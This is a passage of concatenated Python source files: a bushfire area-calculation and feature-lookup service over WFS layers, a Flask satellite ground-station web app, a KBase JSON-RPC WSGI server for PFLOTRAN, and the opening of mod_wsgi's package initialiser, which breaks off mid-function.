layer_url="{}/wfs?service=wfs&version=2.0&request=GetFeature&typeNames={}&outputFormat=json&cql_filter=BBOX({},{},{},{},{}) AND {}".format(layer["kmiservice"],layer["layerid"],layerdefinition(layer)["geometry_property"]["name"],geometry.bounds[1],geometry.bounds[0],geometry.bounds[3],geometry.bounds[2],layer['cqlfilter']) else: layer_url="{}/wfs?service=wfs&version=2.0&request=GetFeature&typeNames={}&outputFormat=json&bbox={},{},{},{}".format(layer["kmiservice"],layer["layerid"],geometry.bounds[1],geometry.bounds[0],geometry.bounds[3],geometry.bounds[2]) #print(layer_url) layer_features = retrieveFeatures(layer_url,session_cookies)["features"] if settings.EXPORT_CALCULATE_AREA_FILES_4_DEBUG: #export intersected areas for debug intersected_features = [] intersected_layer_features = [] for layer_feature in layer_features: layer_geometry = getShapelyGeometry(layer_feature) layer_geometry = transform(layer_geometry,target_proj='aea') if not isinstance(layer_geometry,Polygon) and not isinstance(layer_geometry,MultiPolygon): continue intersections = extractPolygons(geometry_aea.intersection(layer_geometry)) if not intersections: continue layer_feature_area_data = None #try to get the area data from map if merge_result: area_key = [] for key,value in layer["properties"].iteritems(): area_key.append(layer_feature["properties"][value]) area_key = tuple(area_key) layer_feature_area_data = areas_map.get(area_key) if not layer_feature_area_data: #map is not enabled,or data does not exist in map,create a new one layer_feature_area_data = {"area":0} for key,value in layer["properties"].iteritems(): layer_feature_area_data[key] = layer_feature["properties"][value] layer_area_data.append(layer_feature_area_data) if merge_result: #save it into map areas_map[area_key] = layer_feature_area_data feature_area = getGeometryArea(intersections,unit,src_proj='aea') layer_feature_area_data["area"] += feature_area total_layer_area += feature_area if settings.EXPORT_CALCULATE_AREA_FILES_4_DEBUG: #export intersected areas for debug properties = layer_feature["properties"] properties.update({"area":feature_area}) intersected_features.append((intersections,properties)) intersected_layer_features.append((layer_geometry,properties)) if settings.EXPORT_CALCULATE_AREA_FILES_4_DEBUG: 
#export intersected areas for debug if intersected_features: for feat in intersected_features: feat[1].update({"total_area":total_layer_area}) exportGeojson(intersected_features,'/tmp/feature_area_{}_intersection.geojson'.format(layer["id"])) exportGeojson(intersected_layer_features,'/tmp/feature_area_{}.geojson'.format(layer["id"])) area_data["layers"][layer["id"]]["total_area"] = total_layer_area total_area += total_layer_area if not overlap and total_area >= area_data["total_area"] : break except: traceback.print_exc() status["failed"] = "Calculate intersection area between fire boundary and layer '{}' failed.{}".format(layer["layerid"] or layer["id"],traceback.format_exception_only(sys.exc_type,sys.exc_value)) break if "failed" in status: #calcuating area failed return result if not overlap : area_data["other_area"] = area_data["total_area"] - total_area if area_data["other_area"] < -0.01: #tiny difference is allowed. #some layers are overlap if not settings.CHECK_OVERLAP_IF_CALCULATE_AREA_FAILED: status["overlapped"] = "The sum({0}) of the burning areas in individual layers are ({2}) greater than the total burning area({1}).\r\n The features from layers({3}) are overlaped, please check.".format(round(total_area,2),round(area_data["total_area"],2),round(math.fabs(area_data["other_area"]),2),", ".join([layer["id"] for layer in layers])) else: filename = "/tmp/overlap_{}.log".format(feature["properties"].get("id","feature")) status["overlapped"] = "Features from layers are overlaped,please check the log file in server side '{}'".format(filename) if run_in_other_process: result["overlap_logfile"] = filename else: checkOverlap(session_cookies,feature,options,filename) return result def layermetadata(layer): if not layer.get("_layermetadata"): layer["_layermetadata"] = kmi.get_layermetadata(layer["layerid"],kmiserver=layer["kmiservice"]) return layer["_layermetadata"] def layerdefinition(layer): if not layer.get("_layerdefinition"): layerdefinition = kmi.get_layerdefinition(layer["layerid"],kmiserver=layer["kmiservice"]) layer["_layerdefinition"] = layerdefinition else: layerdefinition = layer["_layerdefinition"] if not layerdefinition["geometry_property"]: if layerdefinition["geometry_property_msg"]: raise Exception(layerdefinition["geometry_property_msg"]) elif not layerdefinition["geometry_properties"]: raise Exception("The layer '{}' is not a spatial layer".format(layer["layerid"])) else: raise Exception("Failed to identify the geometry property of the layer '{}'".format(layer["layerid"])) return layerdefinition def getFeature(feature,session_cookies,options): """ options:{ format: properties or geojson//optional default is properties action: getFeature or getIntersectedFeatures or getClosestFeature layers:[ { id: //if missing, use 'layerid' as id layerid: //layerid in kmi, in most cases, layerid is equal with id, if missing, use 'id' as layerid kmiservice: //optinoal, properties:{ //optional name:column in dataset } }, ... 
] } getFeature result:[ { id: layer: failed: message if failed; otherwise is null properties: { name:value } }, ] """ # needs gdal 1.10+ layers = options["layers"] #check whether layers is not empty if not layers: raise Exception("Layers must not be empty.") #check whether layers is list if not isinstance(layers,(list,tuple)): raise Exception("Layers must be list type.") #layers must be list of layers if not isinstance(layers,(list,tuple)): layers = [layers] for layer in layers: if "layerid" not in layer and "id" not in layer: raise Exception("Both 'id' and 'layerid' are missing in layer declaration") elif "layerid" not in layer: layer["layerid"] = layer["id"] elif "id" not in layer: layer["id"] = layer["layerid"] get_feature_data = {"id":None,"layer":None,"failed":None} geometry = getShapelyGeometry(feature) try: for layer in layers: if not layer or not layer.get("kmiservice") or not layer["layerid"]: continue if layer.get('check_bbox'): #check whether feature is in layer's bbox layer_bbox = layermetadata(layer).get("latlonBoundingBox_EPSG:4326") or layermetadata(layer).get("latlonBoundingBox") if not layer_bbox: get_feature_data["failed"] = "Can't find layer({})'s bounding box for epsg:4326".format(layer["layerid"]) break #buffered_bbox is lonlatboundingbox if layer.get("buffer") and isinstance(geometry,Point): checking_bbox = Polygon(buffer(geometry.x,geometry.y,layer["buffer"][-1] if isinstance(layer["buffer"],(list,tuple)) else layer["buffer"],resolution=1)).bounds else: checking_bbox = geometry.bounds if checking_bbox[2] < layer_bbox[1] or checking_bbox[0] > layer_bbox[3] or checking_bbox[3] < layer_bbox[0] or checking_bbox[1] > layer_bbox[2]: #not in this layer's bounding box continue if options["action"] == "getFeature": get_feature_data["feature"] = None if isinstance(geometry,Point): if layerdefinition(layer)["geometry_type"] in ["point",'multipoint']: get_feature_data["failed"] = "The {1} layer '{0}' doesn't support action '{2}'. 
".format(layer["layerid"],layerdefinition(layer)["geometry_property"]["localType"],options["action"]) break else: #polygon or line layer_features = retrieveFeatures( "{}/wfs?service=wfs&version=2.0&request=GetFeature&typeNames={}&outputFormat=json&cql_filter=CONTAINS({},POINT({} {}))".format(layer["kmiservice"],layer["layerid"],layerdefinition(layer)["geometry_property"]["name"],geometry.y,geometry.x), session_cookies )["features"] else: get_feature_data["failed"] = "Action '{}' Only support Point geometry.".format(options["action"]) break elif options["action"] == "getIntersectedFeatures": get_feature_data["features"] = None if isinstance(geometry,Point): if not layer.get("buffer"): get_feature_data["failed"] = "'buffer' is missing in layer '{}'".format(layer["id"]) break buff_polygon = Polygon(buffer(geometry.x,geometry.y,layer["buffer"])) layer_features = retrieveFeatures( "{}/wfs?service=wfs&version=2.0&request=GetFeature&typeNames={}&outputFormat=json&cql_filter=INTERSECTS({},POLYGON(({})))".format(layer["kmiservice"],layer["layerid"],layerdefinition(layer)["geometry_property"]["name"],"%2C".join(["{} {}".format(coord[0],coord[1]) for coord in list(buff_polygon.exterior.coords)])), session_cookies )["features"] elif isinstance(geometry,Polygon): layer_features = retrieveFeatures( "{}/wfs?service=wfs&version=2.0&request=GetFeature&typeNames={}&outputFormat=json&cql_filter=INTERSECTS({},POLYGON(({})))".format(layer["kmiservice"],layer["layerid"],layerdefinition(layer)["geometry_property"]["name"],"%2C".join(["{} {}".format(coord[0],coord[1]) for coord in list(geometry.exterior.coords)])), session_cookies )["features"] else: get_feature_data["failed"] = "Action '{}' Only support Point and Polygon geometry.".format(options["action"]) break elif options["action"] == "getClosestFeature": get_feature_data["feature"] = None layer_feature = None if not isinstance(geometry,Point): get_feature_data["failed"] = "Action '{}' Only support Point geometry.".format(options["action"]) break #should get the grid data at the first try, if can't, set the grid data to null. 
for buff in layer["buffer"] if isinstance(layer["buffer"],(list,tuple)) else [layer["buffer"]]: buff_bbox = Polygon(buffer(geometry.x,geometry.y,buff)).bounds layer_features = retrieveFeatures( "{}?service=wfs&version=2.0&request=GetFeature&typeNames={}&outputFormat=json&bbox={},{},{},{},urn:ogc:def:crs:EPSG:4326".format(layer["wfsservice"],layer["layerid"],buff_bbox[1],buff_bbox[0],buff_bbox[3],buff_bbox[2]), session_cookies )["features"] if len(layer_features) == 1: layer_feature = layer_features[0] break elif len(layer_features) > 1: layer_feature = None minDistance = None for feat in layer_features: if layer_feature is None: layer_feature = feat minDistance = getDistance(geometry,shape(feat["geometry"]),p2_proj=layermetadata(layer).get('srs') or "EPSG:4326") else: distance = getDistance(geometry,shape(feat["geometry"]),p2_proj=layermetadata(layer).get('srs') or "EPSG:4326") if minDistance > distance: minDistance = distance layer_feature = feat break if layer_feature: layer_features = [layer_feature] else: get_feature_data["failed"] = "Action '{}' Not Support".format(options["action"]) break if layer_features: if "feature" in get_feature_data and len(layer_features) > 1: get_feature_data["failed"] = "Found {1} features in layer '{0}' ".format(layer["layerid"],len(layer_features)) break if layer_features: get_feature_data["id"] = layer["id"] get_feature_data["layer"] = layer["layerid"] for layer_feature in layer_features: feat = {} if layer.get("properties"): for name,column in layer["properties"].iteritems(): feat[name] = layer_feature["properties"][column] else: for key,value in layer_feature["properties"].iteritems(): feat[key] = value if options.get("format") == "geojson": #return geojson layer_feature["properties"] = feat feat = layer_feature if "feature" in get_feature_data: get_feature_data["feature"] = feat elif "features" in get_feature_data: if get_feature_data["features"]: get_feature_data["features"].append(feat) else: get_feature_data["features"] = [feat] break except: traceback.print_exc() get_feature_data["failed"] = "{} from layers ({}) failed.{}".format(options["action"],layers,traceback.format_exception_only(sys.exc_type,sys.exc_value)) return get_feature_data def spatial(): # needs gdal 1.10+ try: features = json.loads(bottle.request.forms.get("features")) options = bottle.request.forms.get("options") if options: options = json.loads(options) else: options = {} cookies = settings.get_session_cookie() results = [] features = features["features"] or [] index = 0 while index < len(features): feature = features[index] index += 1 feature_result = {} results.append(feature_result) for key,val in options.iteritems(): if "action" not in val: val["action"] = key if val["action"] == "getArea": feature_result[key] = calculateArea(feature,cookies,val) else: feature_result[key] = getFeature(feature,cookies,val) bottle.response.set_header("Content-Type", "application/json") #print("{}:return response to client.{}".format(datetime.now(),results)) return {"total_features":len(results),"features":results} except: if bottle.response.status < 400 : bottle.response.status = 400 bottle.response.set_header("Content-Type","text/plain") traceback.print_exc() return traceback.format_exception_only(sys.exc_type,sys.exc_value)
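# --- Illustrative sketch, not part of the original module ---
# The helpers above take shapely geometries in EPSG:4326 and reproject them to
# the Albers Equal Area definition in proj_aea before measuring. A hypothetical
# convenience wrapper combining area, bearing and compass direction between a
# reference point and a polygon's centroid could look like this:
def summarise_geometry(polygon, reference_point, unit="ha", compass_points=16):
    area = getGeometryArea(polygon, unit)  # src_proj defaults to EPSG:4326
    bearing = getBearing(reference_point, polygon.centroid)
    return {
        "area": area,
        "bearing": bearing,
        "direction": getDirection(bearing, compass_points),
    }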
root.py
import setting import os import time from multiprocessing import Process from signal import * from datetime import datetime from db import db from flask import Flask, render_template, redirect, url_for, request from pluginManager import pluginManager #crons def sync_cron(): while True: print("[INFO] Starting sync cron") os.system("python3 r2Sync.py") print("[INFO] sync cron finished") print("[INFO] Starting scheduler cron") os.system("python3 scheduler.py") print("[INFO] scheduler cron finished") time.sleep(setting.syncCronInterval) def killer_cron(): while True: print("[INFO] Starting killer cron") os.system("python3 killer.py") print("[INFO] killer cron finished") time.sleep(setting.killerCronInterval) def startCrons(): crons = [ Process(target=sync_cron), Process(target=killer_cron) ] for cron in crons: cron.start() return crons def getSatIcon(satId): if os.path.isfile("./static/images/satellites/%i.png" % (satId)): return "/static/images/satellites/%i.png" % (satId) return "/static/images/satellites/default.png" app = Flask(__name__) plugins = pluginManager(setting.plugins) database = db("main") crons = startCrons() @app.route('/') def root(): curUtc = datetime.utcnow().timestamp() h24s = 86400 return render_template( 'home.html', plannedLen = len(database.planedPassList()), todayLen = len(database.observationListInTime(curUtc, h24s, 10000)), todayPackets = database.sumOfDecodedPacketsInTime(curUtc, h24s), todayDecoded = len(database.hasDataInTime(curUtc, h24s)), groundStationLen = len(setting.groundStations), obsSatsNum = len(database.activeScheduleList()), siteName = setting.siteName, bestImage = database.bestImageInTime(curUtc, h24s), obs = database.hasData(10), datetime = datetime, sats = database.activeSatellites(), getSatIcon = getSatIcon, groundStations = setting.groundStations ) @app.route('/observation') def observation(): obId = request.args.get('ob') ob = database.observation(obId) pluginsHtml = [""] plugins.onLoadObservationSite(ob, pluginsHtml) return render_template( 'observation.html', ob = ob, pluginsHtml = pluginsHtml[0], siteName = setting.siteName, path = os.path, datetime = datetime, setting = setting, getSatIcon = getSatIcon ) @app.route('/gallery') def gallery(): pass """@todo return render_template( 'gallery.html', obs = db.galleryItemList(setting.observationsLimit, setting.galleryMinScore), siteName = setting.siteName ) """ @app.route('/observationlist') def observationList(): sat = request.args.get('sat') time = request.args.get('time') ground = request.args.get('ground') if sat != None: main_title = "All observations of satellite %s" % sat observations = database.observationListOfSat(sat, setting.observationsLimit) elif time != None: main_title = "All observations near %s" % time date = datetime.strptime(time, "%Y-%m-%d") timestamp = datetime.timestamp(date) observations = database.observationListInTime(timestamp, setting.timeRange, setting.observationsLimit) elif ground != None: main_title = "All observations by GroundStation %s" % setting.groundStations[int(ground)]['name'] observations = database.planedPassListOfGroundStation(ground) observations += database.observationListOfGroundStation(ground, setting.observationsLimit) else: main_title = "All observations" observations = database.planedPassList() observations += database.observationList(setting.observationsLimit) return render_template( 'observationList.html', obs = observations, siteName = setting.siteName, datetime = datetime, main_title = main_title )
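# --- Illustrative entry point (an assumption; the original file does not show
# how `app` is served). Under the plain Flask development server it would be:
if __name__ == "__main__":
    # host/port are placeholder values; a WSGI server such as gunicorn pointed
    # at `root:app` is equally valid and leaves the cron processes untouched.
    app.run(host="0.0.0.0", port=8080)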
PFLOTRANServer.py
#!/usr/bin/env python # -*- coding: utf-8 -*- import datetime import json import os import random as _random import sys import traceback from getopt import getopt, GetoptError from multiprocessing import Process from os import environ from wsgiref.simple_server import make_server import requests as _requests from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \ JSONRPCError, InvalidRequestError from jsonrpcbase import ServerError as JSONServerError from biokbase import log from PFLOTRAN.authclient import KBaseAuth as _KBaseAuth try: from ConfigParser import ConfigParser except ImportError: from configparser import ConfigParser DEPLOY = 'KB_DEPLOYMENT_CONFIG' SERVICE = 'KB_SERVICE_NAME' AUTH = 'auth-service-url' # Note that the error fields do not match the 2.0 JSONRPC spec def get_config_file(): return environ.get(DEPLOY, None) def get_service_name(): return environ.get(SERVICE, None) def get_config(): if not get_config_file(): return None retconfig = {} config = ConfigParser() config.read(get_config_file()) for nameval in config.items(get_service_name() or 'PFLOTRAN'): retconfig[nameval[0]] = nameval[1] return retconfig config = get_config() from PFLOTRAN.PFLOTRANImpl import PFLOTRAN # noqa @IgnorePep8 impl_PFLOTRAN = PFLOTRAN(config) class JSONObjectEncoder(json.JSONEncoder): def default(self, obj): if isinstance(obj, set): return list(obj) if isinstance(obj, frozenset): return list(obj) if hasattr(obj, 'toJSONable'): return obj.toJSONable() return json.JSONEncoder.default(self, obj) class JSONRPCServiceCustom(JSONRPCService): def call(self, ctx, jsondata): """ Calls jsonrpc service's method and returns its return value in a JSON string or None if there is none. Arguments: jsondata -- remote method call in jsonrpc format """ result = self.call_py(ctx, jsondata) if result is not None: return json.dumps(result, cls=JSONObjectEncoder) return None def _call_method(self, ctx, request): """Calls given method with given params and returns it value.""" method = self.method_data[request['method']]['method'] params = request['params'] result = None try: if isinstance(params, list): # Does it have enough arguments? if len(params) < self._man_args(method) - 1: raise InvalidParamsError('not enough arguments') # Does it have too many arguments? if(not self._vargs(method) and len(params) > self._max_args(method) - 1): raise InvalidParamsError('too many arguments') result = method(ctx, *params) elif isinstance(params, dict): # Do not accept keyword arguments if the jsonrpc version is # not >=1.1. if request['jsonrpc'] < 11: raise KeywordError result = method(ctx, **params) else: # No params result = method(ctx) except JSONRPCError: raise except Exception as e: # log.exception('method %s threw an exception' % request['method']) # Exception was raised inside the method. newerr = JSONServerError() newerr.trace = traceback.format_exc() if len(e.args) == 1: newerr.data = repr(e.args[0]) else: newerr.data = repr(e.args) raise newerr return result def call_py(self, ctx, jsondata): """ Calls jsonrpc service's method and returns its return value in python object format or None if there is none. This method is same as call() except the return value is a python object instead of JSON string. This method is mainly only useful for debugging purposes. 
""" rdata = jsondata # we already deserialize the json string earlier in the server code, no # need to do it again # try: # rdata = json.loads(jsondata) # except ValueError: # raise ParseError # set some default values for error handling request = self._get_default_vals() if isinstance(rdata, dict) and rdata: # It's a single request. self._fill_request(request, rdata) respond = self._handle_request(ctx, request) # Don't respond to notifications if respond is None: return None return respond elif isinstance(rdata, list) and rdata: # It's a batch. requests = [] responds = [] for rdata_ in rdata: # set some default values for error handling request_ = self._get_default_vals() self._fill_request(request_, rdata_) requests.append(request_) for request_ in requests: respond = self._handle_request(ctx, request_) # Don't respond to notifications if respond is not None: responds.append(respond) if responds: return responds # Nothing to respond. return None else: # empty dict, list or wrong type raise InvalidRequestError def _handle_request(self, ctx, request): """Handles given request and returns its response.""" if 'types' in self.method_data[request['method']]: self._validate_params_types(request['method'], request['params']) result = self._call_method(ctx, request) # Do not respond to notifications. if request['id'] is None: return None respond = {} self._fill_ver(request['jsonrpc'], respond) respond['result'] = result respond['id'] = request['id'] return respond class MethodContext(dict): def __init__(self, logger): self['client_ip'] = None self['user_id'] = None self['authenticated'] = None self['token'] = None self['module'] = None self['method'] = None self['call_id'] = None self['rpc_context'] = None self['provenance'] = None self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3']) self._logger = logger def log_err(self, message): self._log(log.ERR, message) def log_info(self, message): self._log(log.INFO, message) def log_debug(self, message, level=1): if level in self._debug_levels: pass else: level = int(level) if level < 1 or level > 3: raise ValueError("Illegal log level: " + str(level)) level = level + 6 self._log(level, message) def set_log_level(self, level): self._logger.set_log_level(level) def get_log_level(self): return self._logger.get_log_level() def clear_log_level(self): self._logger.clear_user_log_level() def _log(self, level, message): self._logger.log_message(level, message, self['client_ip'], self['user_id'], self['module'], self['method'], self['call_id']) def provenance(self): callbackURL = os.environ.get('SDK_CALLBACK_URL') if callbackURL: # OK, there's a callback server from which we can get provenance arg_hash = {'method': 'CallbackServer.get_provenance', 'params': [], 'version': '1.1', 'id': str(_random.random())[2:] } body = json.dumps(arg_hash) response = _requests.post(callbackURL, data=body, timeout=60) response.encoding = 'utf-8' if response.status_code == 500: if ('content-type' in response.headers and response.headers['content-type'] == 'application/json'): err = response.json() if 'error' in err: raise ServerError(**err['error']) else: raise ServerError('Unknown', 0, response.text) else: raise ServerError('Unknown', 0, response.text) if not response.ok: response.raise_for_status() resp = response.json() if 'result' not in resp: raise ServerError('Unknown', 0, 'An unknown server error occurred') return resp['result'][0] else: return self.get('provenance') class ServerError(Exception): ''' The call returned an error. 
Fields: name - the name of the error. code - the error code. message - a human readable error message. data - the server side stacktrace. ''' def __init__(self, name, code, message, data=None, error=None): super(Exception, self).__init__(message) self.name = name self.code = code self.message = message if message else '' self.data = data or error or '' # data = JSON RPC 2.0, error = 1.1 def __str__(self): return self.name + ': ' + str(self.code) + '. ' + self.message + \ '\n' + self.data def getIPAddress(environ): xFF = environ.get('HTTP_X_FORWARDED_FOR') realIP = environ.get('HTTP_X_REAL_IP') trustXHeaders = config is None or \ config.get('dont_trust_x_ip_headers') != 'true' if (trustXHeaders): if (xFF): return xFF.split(',')[0].strip() if (realIP): return realIP.strip() return environ.get('REMOTE_ADDR') class Application(object): # Wrap the wsgi handler in a class definition so that we can # do some initialization and avoid regenerating stuff over # and over def logcallback(self): self.serverlog.set_log_file(self.userlog.get_log_file()) def log(self, level, context, message): self.serverlog.log_message(level, message, context['client_ip'], context['user_id'], context['module'], context['method'], context['call_id']) def __init__(self): submod = get_service_name() or 'PFLOTRAN' self.userlog = log.log( submod, ip_address=True, authuser=True, module=True, method=True, call_id=True, changecallback=self.logcallback, config=get_config_file()) self.serverlog = log.log( submod, ip_address=True, authuser=True, module=True, method=True, call_id=True, logfile=self.userlog.get_log_file()) self.serverlog.set_log_level(6) self.rpc_service = JSONRPCServiceCustom() self.method_authentication = dict() self.rpc_service.add(impl_PFLOTRAN.run_PFLOTRAN, name='PFLOTRAN.run_PFLOTRAN', types=[dict]) self.method_authentication['PFLOTRAN.run_PFLOTRAN'] = 'required' # noqa self.rpc_service.add(impl_PFLOTRAN.status, name='PFLOTRAN.status', types=[dict]) authurl = config.get(AUTH) if config else None self.auth_client = _KBaseAuth(authurl) def __call__(self, environ, start_response): # Context object, equivalent to the perl impl CallContext ctx = MethodContext(self.userlog) ctx['client_ip'] = getIPAddress(environ) status = '500 Internal Server Error' try: body_size = int(environ.get('CONTENT_LENGTH', 0)) except (ValueError): body_size = 0 if environ['REQUEST_METHOD'] == 'OPTIONS': # we basically do nothing and just return headers status = '200 OK' rpc_result = "" else: request_body = environ['wsgi.input'].read(body_size) try: req = json.loads(request_body) except ValueError as ve: err = {'error': {'code': -32700, 'name': "Parse error", 'message': str(ve), } } rpc_result = self.process_error(err, ctx, {'version': '1.1'}) else: ctx['module'], ctx['method'] = req['method'].split('.') ctx['call_id'] = req['id'] ctx['rpc_context'] = { 'call_stack': [{'time': self.now_in_utc(), 'method': req['method']} ] } prov_action = {'service': ctx['module'], 'method': ctx['method'], 'method_params': req['params'] } ctx['provenance'] = [prov_action] try: token = environ.get('HTTP_AUTHORIZATION') # parse out the method being requested and check if it # has an authentication requirement method_name = req['method'] auth_req = self.method_authentication.get( method_name, 'none') if auth_req != 'none': if token is None and auth_req == 'required': err = JSONServerError() err.data = ( 'Authentication required for ' + 'PFLOTRAN ' + 'but no authentication header was passed') raise err elif token is None and auth_req == 'optional': pass else: 
try: user = self.auth_client.get_user(token) ctx['user_id'] = user ctx['authenticated'] = 1 ctx['token'] = token except Exception as e: if auth_req == 'required': err = JSONServerError() err.data = \ "Token validation failed: %s" % e raise err if (environ.get('HTTP_X_FORWARDED_FOR')): self.log(log.INFO, ctx, 'X-Forwarded-For: ' + environ.get('HTTP_X_FORWARDED_FOR')) self.log(log.INFO, ctx, 'start method') rpc_result = self.rpc_service.call(ctx, req) self.log(log.INFO, ctx, 'end method') status = '200 OK' except JSONRPCError as jre: err = {'error': {'code': jre.code, 'name': jre.message, 'message': jre.data } } trace = jre.trace if hasattr(jre, 'trace') else None rpc_result = self.process_error(err, ctx, req, trace) except Exception: err = {'error': {'code': 0, 'name': 'Unexpected Server Error', 'message': 'An unexpected server error ' + 'occurred', } } rpc_result = self.process_error(err, ctx, req, traceback.format_exc()) # print('Request method was %s\n' % environ['REQUEST_METHOD']) # print('Environment dictionary is:\n%s\n' % pprint.pformat(environ)) # print('Request body was: %s' % request_body) # print('Result from the method call is:\n%s\n' % \ # pprint.pformat(rpc_result)) if rpc_result: response_body = rpc_result else: response_body = '' response_headers = [ ('Access-Control-Allow-Origin', '*'), ('Access-Control-Allow-Headers', environ.get( 'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')), ('content-type', 'application/json'), ('content-length', str(len(response_body)))] start_response(status, response_headers) return [response_body.encode('utf8')] def process_error(self, error, context, request, trace=None): if trace: self.log(log.ERR, context, trace.split('\n')[0:-1]) if 'id' in request: error['id'] = request['id'] if 'version' in request: error['version'] = request['version'] e = error['error'].get('error') if not e: error['error']['error'] = trace elif 'jsonrpc' in request: error['jsonrpc'] = request['jsonrpc'] error['error']['data'] = trace else: error['version'] = '1.0' error['error']['error'] = trace return json.dumps(error) def now_in_utc(self): # noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8 dtnow = datetime.datetime.now() dtutcnow = datetime.datetime.utcnow() delta = dtnow - dtutcnow hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60, 60) return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm) application = Application() # This is the uwsgi application dictionary. On startup uwsgi will look # for this dict and pull its configuration from here. 
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
#    uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run using the single threaded python BaseHTTP service
# listening on port 9999 by default, execute this file
#
try:
    import uwsgi
    # Before we do anything with the application, see if the
    # configs specify patching all std routines to be asynch
    # *ONLY* use this if you are going to wrap the service in
    # a wsgi container that has enabled gevent, such as
    # uwsgi with the --gevent option
    if config is not None and config.get('gevent_monkeypatch_all', False):
        print("Monkeypatching std libraries for async")
        from gevent import monkey
        monkey.patch_all()
    uwsgi.applications = {'': application}
except ImportError:
    # Not available outside of wsgi, ignore
    pass

_proc = None


def start_server(host='localhost', port=0, newprocess=False):
    '''
    By default, will start the server on localhost on a system assigned port
    in the main thread. Execution of the main thread will stay in the server
    main loop until interrupted. To run the server in a separate process, and
    thus allow the stop_server method to be called, set newprocess = True.
    This will also allow returning of the port number.'''

    global _proc
    if _proc:
        raise RuntimeError('server is already running')
    httpd = make_server(host, port, application)
    port = httpd.server_address[1]
    print("Listening on port %s" % port)
    if newprocess:
        _proc = Process(target=httpd.serve_forever)
        _proc.daemon = True
        _proc.start()
    else:
        httpd.serve_forever()
    return port


def stop_server():
    global _proc
    _proc.terminate()
    _proc = None


def process_async_cli(input_file_path, output_file_path, token):
    exit_code = 0
    with open(input_file_path) as data_file:
        req = json.load(data_file)
    if 'version' not in req:
        req['version'] = '1.1'
    if 'id' not in req:
        req['id'] = str(_random.random())[2:]
    ctx = MethodContext(application.userlog)
    if token:
        user = application.auth_client.get_user(token)
        ctx['user_id'] = user
        ctx['authenticated'] = 1
        ctx['token'] = token
    if 'context' in req:
        ctx['rpc_context'] = req['context']
    ctx['CLI'] = 1
    ctx['module'], ctx['method'] = req['method'].split('.')
    prov_action = {'service': ctx['module'], 'method': ctx['method'],
                   'method_params': req['params']}
    ctx['provenance'] = [prov_action]
    resp = None
    try:
        resp = application.rpc_service.call_py(ctx, req)
    except JSONRPCError as jre:
        trace = jre.trace if hasattr(jre, 'trace') else None
        resp = {'id': req['id'],
                'version': req['version'],
                'error': {'code': jre.code,
                          'name': jre.message,
                          'message': jre.data,
                          'error': trace}
                }
    except Exception:
        trace = traceback.format_exc()
        resp = {'id': req['id'],
                'version': req['version'],
                'error': {'code': 0,
                          'name': 'Unexpected Server Error',
                          'message': 'An unexpected server error occurred',
                          'error': trace}
                }
    if 'error' in resp:
        exit_code = 500
    with open(output_file_path, "w") as f:
        f.write(json.dumps(resp, cls=JSONObjectEncoder))
    return exit_code


if __name__ == "__main__":
    if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and
            os.path.isfile(sys.argv[1])):
        token = None
        if len(sys.argv) == 4:
            if os.path.isfile(sys.argv[3]):
                with open(sys.argv[3]) as token_file:
                    token = token_file.read()
            else:
                token = sys.argv[3]
        sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token))
    try:
        opts, args = getopt(sys.argv[1:], "", ["port=", "host="])
    except GetoptError as err:
        # print help information and exit:
        print(str(err))  # will print something like "option -a not recognized"
        sys.exit(2)
    port = 9999
    host = 'localhost'
    for o, a in opts:
        if o == '--port':
            port = int(a)
        elif o == '--host':
            host = a
            print("Host set to %s" % host)
        else:
            assert False, "unhandled option"
    start_server(host=host, port=port)
    # print("Listening on port %s" % port)
    # httpd = make_server( host, port, application)
    #
    # httpd.serve_forever()
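# ---------------------------------------------------------------------------
# Illustrative test helper (not part of the KBase-generated server code).
# It uses the start_server()/stop_server() helpers above to run the
# single-threaded WSGI server in a child process and calls the
# unauthenticated PFLOTRAN.status method; the availability of the
# `requests` package is an assumption.
def _example_status_call():
    import requests

    port = start_server(newprocess=True)
    try:
        payload = {
            "version": "1.1",
            "id": "1",
            "method": "PFLOTRAN.status",
            "params": [],
        }
        reply = requests.post("http://localhost:%d" % port, json=payload)
        return reply.json()["result"]
    finally:
        stop_server()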
__init__.py
from __future__ import print_function, division, absolute_import import os import sys import shutil import subprocess import optparse import math import signal import threading import atexit import types import re import pprint import time import traceback import locale import inspect import getpass import tempfile import copy import posixpath try: import Queue as queue except ImportError: import queue from . import apxs_config _py_version = '%s%s' % sys.version_info[:2] _py_soabi = '' _py_soext = '.so' _py_dylib = '' try: import sysconfig import distutils.sysconfig _py_soabi = sysconfig.get_config_var('SOABI') _py_soext = sysconfig.get_config_var('EXT_SUFFIX') if _py_soext is None: _py_soext = sysconfig.get_config_var('SO') if (sysconfig.get_config_var('WITH_DYLD') and sysconfig.get_config_var('LIBDIR') and sysconfig.get_config_var('LDLIBRARY')): _py_dylib = posixpath.join(sysconfig.get_config_var('LIBDIR'), sysconfig.get_config_var('LDLIBRARY')) if not os.path.exists(_py_dylib): _py_dylib = '' except ImportError: pass MOD_WSGI_SO = 'mod_wsgi-py%s%s' % (_py_version, _py_soext) MOD_WSGI_SO = posixpath.join(posixpath.dirname(__file__), MOD_WSGI_SO) if not os.path.exists(MOD_WSGI_SO) and _py_soabi: MOD_WSGI_SO = 'mod_wsgi-py%s.%s%s' % (_py_version, _py_soabi, _py_soext) MOD_WSGI_SO = posixpath.join(posixpath.dirname(__file__), MOD_WSGI_SO) if not os.path.exists(MOD_WSGI_SO) and os.name == 'nt': MOD_WSGI_SO = 'mod_wsgi%s' % distutils.sysconfig.get_config_var('EXT_SUFFIX') MOD_WSGI_SO = os.path.join(os.path.dirname(__file__), MOD_WSGI_SO) MOD_WSGI_SO = MOD_WSGI_SO.replace('\\', '/') def where(): return MOD_WSGI_SO def default_run_user(): if os.name == 'nt': return '#0' try: import pwd uid = os.getuid() return pwd.getpwuid(uid).pw_name except KeyError: return '#%d' % uid def default_run_group(): if os.name == 'nt': 